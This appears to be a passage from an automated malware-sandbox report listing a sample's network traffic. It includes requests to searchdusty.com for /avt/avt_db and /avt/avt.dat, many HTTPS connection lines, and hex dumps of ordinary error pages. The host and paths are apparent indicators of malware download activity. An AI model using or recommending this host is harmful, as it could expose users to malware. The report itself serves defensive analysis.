          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: GitHub.comDate: Thu, 29 Sep 2022 12:52:04 GMTContent-Type: text/html; charset=utf-8Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-WithCache-Control: no-cacheStrict-Transport-Security: max-age=31536000; includeSubdomains; preloadX-Frame-Options: denyX-Content-Type-Options: nosniffX-XSS-Protection: 0Referrer-Policy: no-referrer-when-downgradeExpect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECTAccept-CH-Lifetime: 31536000Cache-Control: no-cache,no-store,max-age=0,must-revalidateConnection: CloseContent-Length: 17173Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455984.48714.98712.77149&h=stable-morda-any-sas-yp-10&yandexuid=4335905451664455984;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.netContent-Type: text/html; charset=UTF-8Date: Thu, 29 Sep 2022 12:53:04 GMTExpires: Thu, 29 Sep 2022 12:53:04 GMTLast-Modified: Thu, 29 Sep 2022 12:53:04 GMTNEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}Set-Cookie: i=1nAew5AiN63n5S2ILwQon5QYQQnolj0w5I6QSdywm2Mojf5CwhBU1IT3ZUzAGP4yCgVxSUeh6cmbytrNHdgk2OVcmWE=; Expires=Sat, 28-Sep-2024 12:53:04 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnlyVary: Cookie,Accept-Language,Accept-EncodingX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 12:52:51 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:53:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 